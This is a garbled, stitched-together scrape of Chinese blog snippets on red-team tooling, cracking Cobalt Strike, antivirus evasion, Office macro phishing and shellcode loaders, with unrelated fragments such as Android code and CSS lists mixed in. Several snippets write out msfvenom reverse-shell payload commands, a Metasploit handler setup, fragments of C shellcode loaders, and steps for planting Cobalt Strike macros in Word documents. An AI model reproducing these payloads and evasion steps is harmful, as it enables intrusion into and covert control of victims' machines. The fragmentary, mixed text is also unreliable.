红队专题招募六边形战士队员Cobaltstrike渗透测试先进威胁战术介绍使用注意事项架构Listener(监听器)ForeignListeners（外部监听器）PivotListenersBeaconBeacon的安全特性stager下载stagestage准备checkin从TeamServer下载任务返回任务结果Beacon的工作原理Beacon的生成模式stage(有阶段)stageles

红队专题招募六边形战士队员原版CS反编译破解jar包反编译拔掉暗桩初始环境效果招募六边形战士队员一起学习代码审计、安全开发、web攻防、逆向等。。。私信联系原版CS反编译破解jar包反编译CobaltStrike二次开发环境初探CobaltStrike4.5原版2022年5月1日发布+破解及汉化加载4.3及之前版本的暴力替换class文件的破解方法失效IntelliJIDEA自带了一个反编译jav

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档SQL注入学习sqli-labs靶场通关1~16前段时间大概学了一遍内网，免杀正好来将web这块重新复习一遍由于是直接刷关所以只是让关卡报出注入点其余的都没搞

3.所需要的技术水平需要掌握的知识点偏多（举例）：外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要，没有网络安全就没有国

3.所需要的技术水平需要掌握的知识点偏多（举例）：外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要，没有网络安全就没有国

欢迎大家一起来Hacking水友攻防实验室学习，渗透测试，代码审计，免杀逆向，实战分享，靶场靶机，求关注这是MS08067实验室的作品，我看的过程中做了一些笔记，算是复习+学习吧。

4.恶意软件的免杀技术有哪些？5.反病毒技术有哪些？6.反病毒网关的工作原理是什么？7.反病毒网关的工作过程是什么？8.反病毒网关的配置流程是什么？1.什么是恶意软件？

1.打开Cobalt-Strike生产Office宏病毒。首先需要设置监听器、因为钓鱼的目标比较单纯，在这里就不采用域前置技术。然后使用攻击模块，生产Office宏病毒。设置好监听器。

事先声明：本技术文章仅限用于学习和研究，不得将上述内容用于商业或者非法用途，否则，一切后果请您自负。本博客的技术来源于作者网络上所学。您在技术复现前必须得到攻击目标本人的同意，并且在复现结束后从您的电脑中彻底删除相关内容。如有违法事件发生与作者本人无关。一.平台搭建启动CS服务器命令./teamserver服务器IP(实际要用公网服务器IP)密码客户端连接若连接不成功，需要检测是否开启50050端

RLO伪装图片执行利用msf生成木马x.exemsfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.96.128LPORT=4444-fexe-ox.exeMetasploit打开反向监听的命令useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcp下面利用RLO对x.

基础篇初级免杀技术第1章变脸免杀是一种反杀毒技术。它除了使病毒木马免于被查杀外，还可以扩增病毒木马的功能，改变病毒木马的行为

绕过杀毒软件，免杀木马制作（以AVGAntiSpyware杀毒软件为例）一、将Sever.exe打开，分块生成100个文件二、使用AVGAntiSpyware查杀生成的文件，再二次处理，重复这个过程，直到缩小到很小的范围

本专题文章导航1.远控免杀专题(1)-基础篇：https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg2.远控免杀专题(2)-msfvenom隐藏的参数：https

转载：https://mp.weixin.qq.com/s/LfuQ2XuD7YHUWJqMRUmNVA免杀能力一览表几点说明：1、上表中标识√说明相应杀毒软件未检测出病毒，也就是代表了Bypass。

Office宏分离免杀的方式是在目标用户的office开启宏功能的前提下，诱骗其使用office办公软件打开文档，通过加载远程的恶意宏代码，达到控制目标主机权限的目的。

0x01免杀能力一览表几点说明：1、上表中标识√说明相应杀毒软件未检测出病毒，也就是代表了Bypass。

反VT-沙盒检测-Go&Python介绍：近年来，各类恶意软件层出不穷，反病毒软件也更新了各种检测方案以提高检率。其中比较有效的方案是动态沙箱检测技术，即通过在沙箱中运行程序并观察程序行为来判断程序是否为恶意程序。简单来说沙盒就是为运行中的程序提供的隔离环境。为了逃避沙箱/安全人员的检测，恶意软件使用了各类识别沙箱/虚拟机的技术，用于判断自身程序是否运行在沙箱/虚拟机中。go语言1.使用GoLan

office钓鱼免杀宏的制作由于国内近些年来，红蓝对抗的升级，各类hvv，重保，防守方上各种杀软，edr，防御手段层出不穷，不会免杀真的是欲哭无泪，今天带来EvilClippy恶意文档助手，对office

这篇随笔的大部分内容来自《黑客免杀攻防》第一章说的免杀的历史，点了一下免杀和Rootkit的区别。Rootkit的词条介绍当然，一个菜鸟怎么会理解呢，只能默默地记一下，接受了。

免杀理论基础本文主要为免杀入门的基础理论笔记，前几年写下的找到正好发出来，因审核需要删除部分内容，有免杀基础和一定实操经验人士可以跳过本文概念免杀全称为反杀毒技术AntiAnti-Virus简称“免杀”

apache服务上2、修改文档“2.docx"文件名为”2.zip“,并将“2.zip”进行解压3、修改下面的文件4、将修改后的文件夹重新压缩为"2.zip"，并修改后缀名为“2.docx”5、成功实现分离免杀

我们可以使用Shellcode来完成我们需要的任务弹窗的代码，可以被认为是一段Shellcode，获取某个模块的基址的代码，也可以被认为是一段Shellcode，同理，拿来干坏事的代码，也是Shellcode免杀技术为何出现如今的杀毒软件都拥有查杀病毒木马的能力

CS生成宏&上线生成宏1.cs生成宏，如下图操作2.点击复制宏代码，保存下来cs上线注：如下操作使用的是word，同样的操作也适用于Excel1.新建一个word文档，使用word打开。点击文件——2.更多——选项——3.自定义功能区——勾选开发工具——点击确定4.点击开发工具——新建宏——任意宏名——宏的位置(之前新建的word文档)——创建5.跳转到如下，将cs生成的宏代码写入——点击保存——

tv.setPaintFlags(tv.getPaintFlags()|Paint.STRIKE_THRU_TEXT_FLAG);方式二：获取画笔后设置属性，重绘TextView。

WEB网站只是单一的网站服务，在渗透测试过程中可能不是攻击网站，而是寻找其他服务漏洞，如数据库、FTP等渗透测试覆盖面更为广泛，需要考虑如何深入利用漏洞使得攻击效果最大化如提权、内网攻击、域环境攻击、制作免杀后门等渗透测试学习路径

安全性高，隐匿性强，可变形免杀小马体积小，功能少只有文件上传功能大马体积大，功能全能够管理数据库、文件管理、对站点进行快速的信息收集，甚至能够提权Webshell集合https://github.com

一、exe程序生成1.使用如下shellcode加载器，生成c/c++语言的exe程序加载器：1.c#include#include#pragmacomment(linker,"/section:.data,RWE")unsignedcharshellcode[]=生成的shellcode;intmain(){__asm{moveax,offsetshellcode_emit0xFF_emit0x

C&Py-DLL劫持-语言-调用加载1.使用visualstudio创建项目2.将文件名重命名为.c后缀3.将如下加载器代码生成dll文件加载器代码：#include"pch.h"#include#include#include#pragmacomment(linker,"/subsystem:\"Windows\"/entry:\"mainCRTStartup\"")//windows控制台程序

3.所需要的技术水平需要掌握的知识点偏多（举例）：外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要，没有网络安全就没有国

3.所需要的技术水平需要掌握的知识点偏多（举例）：外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要，没有网络安全就没有国

0、环境配置说明应该全部使用云服务器完整演示比较好，奈何太穷了买不起服务器，只能用本地环境演示。所需环境如下：系统环境：CentOS7，Windows10软件环境CobaltStrike4.7,ShellQMaker，360杀毒一、CobaltStrike环境配置CentOS7.8环境安装CobaltStrike必备工具安装yum-yinstalllrzsz,unzip上传文件解压然后切换至Cob

Nim语言-加载工具-NimShellCodeLoader项目配置环境：1.下载Nim语言&配置bin目录环境变量链接：https://nim-lang.org/install_windows.html配置环境变量2.下载mingw链接：https://nim-lang.org/download/mingw64.7z配置bin目录环境变量3.下载git，配置bin目录环境变量链接：https://

又或者，在RedTeam拿下一台服务器，为达到长久控制的目的而专门定制持久化后门（免杀肯定是必须的）的前提下，他们会如何结合系统自身的某些特性，达到持久化控制的效果？

无文件落地&分离拆分无文件落地&分离拆分其实就是内存免杀，内存免杀是将shellcode直接加载进内存，由于没有文件落地，因此可以绕过文件扫描策略的查杀。

内存加载-UUID地址-ShellCode转换介绍：通用唯一识别码(UUID),是用于计算机体系中以识别信息数目的一个128位标识符，根据标准方法生成，不依赖中央机构的注册和分配，UUID具有唯一性。演示语言：c++1.使用以下代码将c语言的shellcode转换为uuid类型代码：uuid.pyimportuuidimportbinasciibuf=b"生成的shellcode"hex=bina

免杀技术，你需要学习哪些内容？什么是免杀？免杀是指通过各种技术手段使恶意软件或病毒能够逃避杀毒软件的检测和阻止，成功地感染目标系统。

【virustotal】【D盾】【shellpub】接下来进行免杀，免杀就是将这些被识别的特征进行替换，绕过，混淆和干扰。

1.2.1WAF指纹识别工具1.3绕WAF的多种方式2.SQLiBypass2.1Bypass思路2.1.1层面问题2.1.2HTTP问题2.2绕过分析2.2.1绕过方式2.2.2脚本编写3.一句话木马免杀

JAVA-ShellCode免杀-源码修改&打包EXEShellcode-生成/上线1.msf生成shellcode命令：msfvenom-pjava/meterpreter/reverse_tcpLHOST

演示：PowerShell-生成和上线1.生成——启动cs，生成两种模式的powershell脚本文件模式：执行ps1文件上线命令模式：执行txt文件中的命令上线2.文件模式powershell执行——两种方法方法一：打开Win7以上自带的WindowsPowerShellISE来执行成功上线：方法二：打开命令行，启动PowerShell来执行命令：powershell命令：.\payload.p

C#&NET-ShellCode-生成/上线一、生成：1.msf生成C#语言的shellcode命令：msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.206.192LPORT=4444-ex86/shikata_ga_nai-i15-fcsharp二、上线：1.c#语言shellcode加载代码：usingSystem;usin

1.概述一直很想有一个自己的控，奈何实力不允许，CS仍然是目前市面上最好用的控，但是也被各大厂商盯得很紧，通过加载器的方式进行免杀效果有限，后来看到有人用go重写了CS的beacon，感觉这个思路很好，

前言这是半年前我学习Rust和免杀时的一些记录，最近打开知识库看到了这篇半年前的笔记，并且发现我常逛的安全社区都比较少有人分享Rust以及Rust免杀的帖子，于是想着将这篇笔记分享出来供大家参考和指正。

h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,img,ins,kbd,q,s,samp,small,strike

3.所需要的技术水平需要掌握的知识点偏多（举例）：外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要，没有网络安全就没有国

对于此问题，打算开一个专题进行木马免杀的分析，先从最最重要的PE文件说起，要攻击Windows系统，如果不懂PE文件，面对杀毒软件，则只能束手就擒了。PE文件PE（PortableExec

大家玩玩就好，有杀毒软件可能会被干掉，关于免杀方式有很多，请勿捉弄同学，谢谢msfvenom-pwindows/meterpreter/reverse_tcpLHOST=10.0.128.149LPORT

后面一段时间直到hw结束，我打算把主要精力都放在免杀上面，不会点C真的寸步难行，或者就只能从go下手了0x01SSP记录明文密码SSP（SecuritySupportProvider）是一个用于实现身份验证的

html5删除的标签：basefont、big、center、font、s、strike、tt、u、frame、noframes、frameset、bgsound、blink、marquee、applet

1.Thefindingsofthesurveystrikemanyasunconvincing.2.Thereconclusionsstrikemeasreasonable,atleastfromtheirpointofview.